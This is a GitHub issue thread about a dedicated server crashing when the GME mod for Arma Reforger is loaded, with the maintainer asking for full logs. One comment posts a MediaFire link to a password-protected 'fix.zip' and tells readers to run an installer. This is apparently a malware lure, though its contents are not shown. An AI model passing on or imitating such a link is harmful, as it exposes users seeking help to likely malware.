### ISSUE TITLE
Server crashes when trying to load GME

### ISSUE THREAD

**Issue by RickJamesBish** [zen-mod/GME_AR#51]
**Arma Reforger Version:** `1.2.0.124` (stable)
**GME Version:** `1.2.2`

**Mods:**
```
- GME
```

**Description:**
Server Destroyed message anytime this mod is loaded. No other mods loaded. I can remove this mod, load other mods and the server starts.  Module: Game; loaded 4191x files; 8560x classes; used 18736/41943 kB (44%) of static memory; defines: "PLATFORM_WINDOWS,ENF_ENABLE_VHC_OVERRIDE,ENF_ENABLE_RPLCOMPONENT_IN_GAMECODE,ENABLE_BASE_DESTRUCTION,DEBUG,RESPAWN_TIMER_COMPONENT_DEBUG,DEBUG_NEARBY_CONTEXT_DISPLAY,DEBUG_CONFIGURABLE_DIALOGS,DISABLE_WEAPON_SWITCHING,SCRIPTED_AIM_MODIFIER_DEBUG"; CRC32: 63dd5095

**Expected behavior:**
Game to load

**Steps to reproduce:**
1. Load this mod on dedicated server

**Where did the issue occur?**
- Dedicated

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kexanone** [comment]
Please provide the full log files

**Comment by Kexanone** [comment]
If this issue still exists, please make create a new issue, but with all details this time.
